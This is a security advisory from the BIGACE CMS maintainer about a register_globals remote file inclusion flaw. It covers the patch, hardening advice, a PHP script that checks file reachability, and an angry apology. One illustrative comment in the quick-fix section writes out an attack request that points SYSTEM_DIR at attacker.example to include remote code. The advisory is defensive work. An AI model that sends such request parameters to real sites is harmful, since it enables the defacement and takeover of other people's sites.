Patch to fix the issue

Download the patch from the Sourceforge download page (direct link).

Install it using the BIGACE Admin Panel: System / Extensions / Upload.

For discussion, join this forum thread in General/Security.

Background Information

Which sites are in danger?

First of all, the problem does not occur in all circumstances (as you can see from this page).

The problem only exists if your environment has the PHP setting "register_globals" enabled. The installer asks you to turn it "Off"; you can verify the value that is actually active for your web server with phpinfo().

You should also check that you installed the .htaccess files that block browser access to the system directories (/system/, /consumer/). File permissions (see below) increase security even further.

What else? Ask (or push) your hoster to install a PHP hardening patch like Suhosin. It increases the security of PHP environments considerably, especially against software flaws that are not yet known.

File permissions

The following is always true, not just because of the current problem.

Make sure to check your file permissions by requesting the following URLs (adjust the host and path to your own installation):

  • http://localhost/bigace/addon/smarty/plugins/function.captcha.php
  • http://localhost/bigace/system/application/util/item_information.php
  • http://localhost/bigace/system/application/util/jstree.php
  • http://localhost/bigace/system/classes/sql/AdoDBConnection.php
  • http://localhost/bigace/system/admin/plugins/menu/menuTree/plugin.php

These files must NOT be accessible from a browser. If any of these requests returns a page (file content, a blank page or a PHP error) instead of being refused with 403 Forbidden (or 404), fix the file permissions and the .htaccess rules.
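As an added check (not part of BIGACE), the following PHP command-line script requests each of the files listed above and reports whether the web server refuses them. The base URL is assumed to be the http://localhost/bigace from the list; change it to your own host and path.

```php
<?php
// Added check script, not part of BIGACE. Requests each protected file and
// reports whether the web server blocks it. Run from the command line:
//   php check_protected.php
$base = 'http://localhost/bigace';   // assumption: installation root as in the list above

// Files that must never be executable through a browser (from the list above).
$protected = array(
    '/addon/smarty/plugins/function.captcha.php',
    '/system/application/util/item_information.php',
    '/system/application/util/jstree.php',
    '/system/classes/sql/AdoDBConnection.php',
    '/system/admin/plugins/menu/menuTree/plugin.php',
);

// Returns the HTTP status code of a GET request, or 0 on connection failure.
function fetchStatus($url)
{
    $ctx = stream_context_create(array('http' => array(
        'method'        => 'GET',
        'ignore_errors' => true,   // return the response even on 4xx/5xx
        'timeout'       => 5,
    )));
    $body = @file_get_contents($url, false, $ctx);
    // $http_response_header is created in this scope by file_get_contents
    if ($body === false || !isset($http_response_header[0])) {
        return 0;
    }
    // status line looks like "HTTP/1.1 403 Forbidden"
    if (preg_match('#^HTTP/\S+\s+(\d{3})#', $http_response_header[0], $m)) {
        return (int) $m[1];
    }
    return 0;
}

// A protected file counts as blocked only when the server refuses it (403)
// or does not expose it at all (404). Anything else, 200 in particular but
// also a 500 caused by a failing include, means the script was executed.
function isBlocked($status)
{
    return $status === 403 || $status === 404;
}

$allBlocked = true;
foreach ($protected as $path) {
    $status = fetchStatus($base . $path);
    $ok     = isBlocked($status);
    $allBlocked = $allBlocked && $ok;
    printf("%-4s %3d %s\n", $ok ? 'OK' : 'FAIL', $status, $base . $path);
}
exit($allBlocked ? 0 : 1);
```

The script exits with status 1 if any file is still reachable, so it can be wired into a cron job or a deployment check. A status of 0 means the request itself failed (wrong host, timeout), which is reported as FAIL rather than silently passed.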

Quick code fixes

The following code change is obsolete now that the patch has been released!

One quick fix is to edit the file "/addon/smarty/plugins/function.captcha.php":

Move line 3 (the require_once) into the function itself, so that it is no longer executed at file scope:

// ...
function smarty_function_captcha($params, &$smarty)
{
    // former line 3 (the require_once) goes here, inside the function body
    // ...
}
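To show why moving that single line matters, here is an added PHP illustration. It is not BIGACE's code: the global `$GLOBALS['_BIGACE']['SYSTEM_DIR']`, the included file `Captcha.php` and the `Captcha` class are hypothetical stand-ins for whatever the real line 3 referenced, and the request-parameter mechanism shown is the one implied by the PS below (a `GLOBALS[...]` parameter under register_globals).

```php
<?php
// Added illustration, NOT the original function.captcha.php.
// $GLOBALS['_BIGACE']['SYSTEM_DIR'], classes/Captcha.php and class Captcha
// are hypothetical stand-ins for the real names.

// --- Vulnerable layout (a require_once at file scope) ----------------------
//
//   require_once($GLOBALS['_BIGACE']['SYSTEM_DIR'] . 'classes/Captcha.php');
//
// At file scope this runs the moment the file itself is requested, before
// BIGACE has bootstrapped. With register_globals=On, PHP fills global
// variables from the request before any code runs, so a direct request like
//
//   GET /addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][SYSTEM_DIR]=http://attacker.example/
//
// lets the client choose the include path: an attacker-controlled file is
// pulled in and executed, unless the server refuses direct access to the file
// (.htaccess / permissions) or a hardener such as Suhosin rejects a GLOBALS
// request parameter.

// --- Fixed layout: the include lives inside the plugin function ------------

function smarty_function_captcha($params, &$smarty)
{
    // Runs only when Smarty invokes the plugin during a real BIGACE request,
    // i.e. after the application has set $GLOBALS['_BIGACE']['SYSTEM_DIR']
    // itself, overriding anything register_globals injected from the request.
    require_once($GLOBALS['_BIGACE']['SYSTEM_DIR'] . 'classes/Captcha.php');

    $captcha = new Captcha();            // hypothetical class from the included file
    return $captcha->render($params);    // hypothetical API; Smarty outputs the string
}

// Requesting the fixed file directly now only defines the function; no include
// path is evaluated at file scope, so there is nothing for the parameter to hijack.
```

Moving the include is a mitigation for this one file; the .htaccess rules and file permissions described above are what stop the whole class of direct-access problems, and they should be in place regardless of this fix.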

Sorry folks!

I am really, really sorry about the problems; some sites have already been defaced.

The people who found the problem did NOT try to contact me; they released the exploit without any warning on "known pages", which I do not check regularly.

Starting a discussion about HOW MUCH I HATE THOSE IDIOTS who ruin other people's (mostly private) work is worthless. Finding security holes is a good job and I respect people with the ability to search for and find problems in software, but:
Not if they use their knowledge for such stupid attacks, only meant to destroy!

Want to say thanks to the people that released these exploits without a warning?! You can find their website in the exploit code on the milw0rm page.


PS: my log file is full of attacks, all day long ... just to let you know, you great "hackers" out there: Suhosin patch installed, GLOBALS as a parameter is NOT allowed!